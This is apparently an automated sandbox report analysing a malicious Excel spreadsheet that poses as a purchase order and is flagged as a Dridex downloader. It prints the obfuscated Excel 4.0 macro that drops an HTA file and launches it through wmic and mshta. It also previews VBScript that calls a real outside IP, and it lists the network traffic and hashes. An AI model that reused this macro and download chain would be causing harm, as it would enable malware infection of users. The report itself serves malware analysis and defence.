                                                                                                                        https://clients.config.office.net/user/v1.0/iosD2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.diagnostics.office.com#vEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://login.windows.net/common/oauth2/authorize=UoEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                                                                                    high

                                                                                                                                    Contacted IPs

                                                                                                                                    Public

IP: 149.129.254.152
Domain: unknown
Country: Singapore
ASN: 45102
ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Malicious: false

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                    Analysis ID:532575
                                                                                                                                    Start date:02.12.2021
                                                                                                                                    Start time:14:10:32
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 6m 49s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:order 4544471372.xls
                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                    Number of analysed new started processes analysed:28
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.expl.evad.winXLS@7/8@0/1
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 2
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                    • Attach to Office via COM
                                                                                                                                    • Scroll down
                                                                                                                                    • Close Viewer
                                                                                                                                    Warnings:
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.2.0, 52.109.8.25, 52.109.88.39
                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                    • Not all processes were analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    Time        Type               Description
                                                                                                                                    14:13:10    API Interceptor    1x Sleep call for process: WMIC.exe modified
                                                                                                                                    14:13:13    API Interceptor    2x Sleep call for process: mshta.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs


                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN


                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\tCeltZ.rtf
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):5004
                                                                                                                                    Entropy (8bit):5.102988854105844
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:NZVagS812z4VR9r+ZYjrPd06dtalqZPV1sCxKfvM6YGYGJAHHJKZz2mJuR/x3VGK:NZQ012z4/1+ZYjbyKmqZ1xAnYPGMcym6
                                                                                                                                    MD5:A98108794EDA278A4E8626B56FE4B231
                                                                                                                                    SHA1:C0AB9E72B0E85C5BFB6B89F1428B5240EC6AEA60
                                                                                                                                    SHA-256:DE3A47367EF37CD391133E378F03FE317D98A7916E4E192E5513EC19159A10D9
                                                                                                                                    SHA-512:33C3233FABFB9BA0A79E1AAF7CD2F8861C81971454362315CFF8366D8647E91CFEBF49BA82E26FA7D090D92E203723D1C61F74BEDD0A280145C000470BFDBA9F
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\tCeltZ.rtf, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function PRGgdsXbPi()..Set uPWUurSwKjJEMwcj = CreateObject(Chr(77) & "SX" & Chr(77) & "" & "" & Chr(76) & Chr(50) & ".Se" & "rv" & "erX" & "MLH" & Chr(84) & "" & Chr(84) & "P." & "6.0" & "")..uPWUurSwKjJEMwcj.Open "" & "" & "" & "" & "GE" & Chr(84) & "", "ht" & Chr(116) & "p:/" & Chr(47) & "14" & "9." & "12" & "9.2" & "54." & "" & "152" & ":8" & "080" & "" & "/6" & "" & "tfc" & "nfu" & Chr(99) & Chr(107) & "nu" & "gg" & "et" & "4g" & Chr(112) & "en" & "is" & "3da" & Chr(100) & "" & "" & "e5" & "z6c" & "pc", False ..uPWUurSwKjJEMwcj.SetRequestHeader "User-Agent","rape"..uPWUurSwKjJEMwcj.Send..End Function....Function VKcVtLgGiyUyBtF()..NiJZKsgWiRQhouXQ = "wmi" & "c " & Chr(112) & Chr(114) & "oc" & "ess" & Chr(32) & "cal" & "l " & Chr(99) &
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D2E8A974-A9E1-4AA2-B9A4-381BFC494102
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):140372
                                                                                                                                    Entropy (8bit):5.357219203875202
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:gcQIfgxrBdA3gBwtnQ9DQW+zUA4Ff7nXmvid1XiE6LWmE9:suQ9DQW+zmXfH
                                                                                                                                    MD5:1DF0BE5F1698F4B884B4CC28BF995534
                                                                                                                                    SHA1:28CC332994478E147DDA43626FE2D96AF985B20D
                                                                                                                                    SHA-256:A9E4C7089DA384A44AF2CA841EF9C90D21ACFD952F929BB7D95A55AD324B0800
                                                                                                                                    SHA-512:0BCA09555484E0F518EE508066EEA9709EBEEE96033787DA8940034DD1E875E27FD49D2ED8D0994607FEEC2C619B9F5CEA270D826B22698AE475D833D76F7ADC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T13:11:37">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8B26352.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PNG image data, 1170 x 183, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):101504
                                                                                                                                    Entropy (8bit):7.9825226677650285
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:LxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02l9dIND145:GahmlYOOeRnwNKIde145
                                                                                                                                    MD5:AA4CE969F3A7539F94F12DBA43D9D36F
                                                                                                                                    SHA1:67FBAFD61ABB04C68A2C4E074959C49AF1CF6DBB
                                                                                                                                    SHA-256:BC3719669DEBD201C5FE2E16EB38605287FDD5DAB45445264388A58282F28999
                                                                                                                                    SHA-512:78E78115A9929B04E5C4D26A735E9CC76831525A51C7CD97FDA849BD9377C3FEE503E770C7CF9B5FF1E0F13F0A4A38F21A8E164C1CA8C038F110D877EC7175CE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    C:\Users\user\Desktop\FFC20000
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):155069
                                                                                                                                    Entropy (8bit):7.95786658122654
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:UU3HAnIoTFJ3AA3YqICxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEe:UkAIcFFAkIVahmlYOOeRnwNKIde14Q
                                                                                                                                    MD5:07145F1486F9558BEE707ABC21FD5CC1
                                                                                                                                    SHA1:27734E41E3D924005BA90DAA04615538EE2E8CA5
                                                                                                                                    SHA-256:1ED04CC0F0DB6AAC22E194014FE8EBB8490C2BAC5B8BD5B77ADA201C0BD93392
                                                                                                                                    SHA-512:72D181CA5D45488CBACD1BDD0979C86FFB8DC2B63A7B6D9BD32934C2B2DFD847E12B0B85622C8063292BA8D2DDE5C22CB80827A6ACD8A44FC382DA6010686939
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                    C:\Users\user\Desktop\FFC20000:Zone.Identifier
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                    C:\Users\user\Desktop\order 4544471372.xls (copy)
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):155069
                                                                                                                                    Entropy (8bit):7.95786658122654
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:UU3HAnIoTFJ3AA3YqICxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEe:UkAIcFFAkIVahmlYOOeRnwNKIde14Q
                                                                                                                                    MD5:07145F1486F9558BEE707ABC21FD5CC1
                                                                                                                                    SHA1:27734E41E3D924005BA90DAA04615538EE2E8CA5
                                                                                                                                    SHA-256:1ED04CC0F0DB6AAC22E194014FE8EBB8490C2BAC5B8BD5B77ADA201C0BD93392
                                                                                                                                    SHA-512:72D181CA5D45488CBACD1BDD0979C86FFB8DC2B63A7B6D9BD32934C2B2DFD847E12B0B85622C8063292BA8D2DDE5C22CB80827A6ACD8A44FC382DA6010686939
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                    C:\Users\user\Desktop\~$order 4544471372.xls
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):165
                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    \Device\ConDrv
                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):160
                                                                                                                                    Entropy (8bit):5.083203110114614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgk2Tfs36JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egk2LsqE
                                                                                                                                    MD5:F0FF7C0DB9FBFEA7E97F757B2DE48655
                                                                                                                                    SHA1:09AEFC1E69DF23FE6E02220C1AF0594F59AF8E0F
                                                                                                                                    SHA-256:327D5F15A71546595D8DAB851049B15D941A266DB6B90E855AEA6ADDBD8B45BE
                                                                                                                                    SHA-512:9588D9F00A7F63F5E065319404CB83C1C6D995361D913CB046817763C51F6C910A21524BE0B8844ED7030DC2D2563BCE289C0F362F85138D9DE8763F336B0F8B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6096;...ReturnValue = 0;..};....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                    Entropy (8bit):7.950279542064319
                                                                                                                                    TrID:
                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                    • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                    File name:order 4544471372.xls
                                                                                                                                    File size:153116
                                                                                                                                    MD5:531039a455e1f0598cd201b785a1152a
                                                                                                                                    SHA1:4880df9e94090243029e54a34e941c70298401c7
                                                                                                                                    SHA256:cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
                                                                                                                                    SHA512:5a74dd1f8391f9991e43b11ee8af2ca4ddc0b7045116451293f7fa2a5e0d90d9fac66f1eb8d766d03779d5adbeb0e2845709a2cce4663d70af875512e98b29f3
                                                                                                                                    SSDEEP:3072:9l0wcwAKQXICZPdxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02lE:v0qAKeCahmlYOOeRnwNKIde14jd2
                                                                                                                                    File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "order 4544471372.xls"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:
                                                                                                                                    Application Name:
                                                                                                                                    Encrypted Document:
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:

                                                                                                                                    Macro 4.0 Code

                                                                                                                                    1,18,=B46-B52
                                                                                                                                    3,18,=U6*I71
                                                                                                                                    4,18,=B83*G21
                                                                                                                                    7,18,=B77*R92
                                                                                                                                    8,18,=W36-M75
                                                                                                                                    9,18,=B46-O46
                                                                                                                                    11,18,=U77-C57
                                                                                                                                    12,18,=E12-P4
                                                                                                                                    14,18,=ALERT("" & CHAR(69) & CHAR(114) & "ro" & CHAR(114) & "! S" & CHAR(101) & CHAR(110) & "ding " & CHAR(114) & "eport" & CHAR(32) & CHAR(116) & "o Mi" & CHAR(99) & "ros" & CHAR(111) & CHAR(102) & "t." & CHAR(46) & CHAR(46))
                                                                                                                                    15,18,=M14-U64
                                                                                                                                    17,18,=E84+W18
                                                                                                                                    18,18,=A24-C32
                                                                                                                                    20,18,=D23-B20
                                                                                                                                    21,18,=H56-A9
                                                                                                                                    22,18,=I25+E46
                                                                                                                                    23,18,=B36*X99
                                                                                                                                    25,18,=E47*D60
                                                                                                                                    29,18,=FOPEN("" & CHAR(67) & ":\ProgramData\tCeltZ." & CHAR(114) & "tf", 3)
                                                                                                                                    32,18,=H49+Y83
                                                                                                                                    38,18,=I28*Z36
                                                                                                                                    39,18,=FOR.CELL("nNwXHnQeUQ",Sheet1!BC161:BC5164, TRUE)
                                                                                                                                    42,18,=H4+Q85
                                                                                                                                    43,18,=T83*Y92
                                                                                                                                    45,18,=P53-Z33
                                                                                                                                    49,18,=Z74-U45
                                                                                                                                    51,18,=J16*G4
                                                                                                                                    52,18,=FWRITE(0,CHAR(nNwXHnQeUQ))
                                                                                                                                    54,18,=B78+K46
                                                                                                                                    57,18,=K76*U21
                                                                                                                                    58,18,=E59+I66
                                                                                                                                    59,18,=B76*H43
                                                                                                                                    61,18,=L9+M51
                                                                                                                                    62,18,=NEXT()
                                                                                                                                    63,18,=J93-Y76
                                                                                                                                    65,18,=O26+Z33
                                                                                                                                    67,18,=R40+R44
                                                                                                                                    70,18,=P71-K20
                                                                                                                                    72,18,=H56*M6
                                                                                                                                    73,18,=K100*A21
                                                                                                                                    74,18,=U56-N36
                                                                                                                                    76,18,=EXEC("wmic proces" & CHAR(115) & " call create " & CHAR(34) & "msh" & CHAR(116) & "a C:\Pro" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & "tC" & CHAR(101) & "" & CHAR(108) & CHAR(116) & "Z.rtf" & CHAR(34))
                                                                                                                                    77,18,=I96-M97
                                                                                                                                    81,18,=B62+L66
                                                                                                                                    83,18,=Y51+X5
                                                                                                                                    89,18,=RETURN()
                                                                                                                                    

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                    Dec 2, 2021 14:13:14.373107910 CET | 49816 | 8080 | 192.168.2.7 | 149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.652904987 CET | 8080 | 49816 | 149.129.254.152 | 192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:14.653083086 CET | 49816 | 8080 | 192.168.2.7 | 149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.653744936 CET | 49816 | 8080 | 192.168.2.7 | 149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.933520079 CET | 8080 | 49816 | 149.129.254.152 | 192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:15.302388906 CET | 8080 | 49816 | 149.129.254.152 | 192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:15.349163055 CET | 49816 | 8080 | 192.168.2.7 | 149.129.254.152

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • 149.129.254.152:8080

                                                                                                                                    HTTP Packets

                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                    0 | 192.168.2.7 | 49816 | 149.129.254.152 | 8080 | C:\Windows\System32\mshta.exe
                                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                                    Dec 2, 2021 14:13:14.653744936 CET | 8517 | OUT | GET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Language: en-US
                                                                                                                                    User-Agent: rape
                                                                                                                                    Host: 149.129.254.152:8080
                                                                                                                                    Dec 2, 2021 14:13:15.302388906 CET | 8518 | IN | HTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.15.12
                                                                                                                                    Date: Thu, 02 Dec 2021 13:13:15 GMT
                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 10
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 68 69 20 77 61 6e 6b 65 72 73
                                                                                                                                    Data Ascii: hi wankers


                                                                                                                                    Code Manipulations

System Behavior

General

Start time:14:11:34
Start date:02/12/2021
Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:0x1030000
File size:27110184 bytes
MD5 hash:5D6638F2C8F8571C593999C58866007E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:13:09
Start date:02/12/2021
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
Imagebase:0xa30000
File size:391680 bytes
MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:13:10
Start date:02/12/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff774ee0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:14:13:11
Start date:02/12/2021
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6e70f0000
File size:488448 bytes
MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:14:13:11
Start date:02/12/2021
Path:C:\Windows\System32\mshta.exe
Wow64 process (32bit):false
Commandline:mshta C:\ProgramData\tCeltZ.rtf
Imagebase:0x7ff6c7ab0000
File size:14848 bytes
MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis

Executed Functions

Non-executed Functions
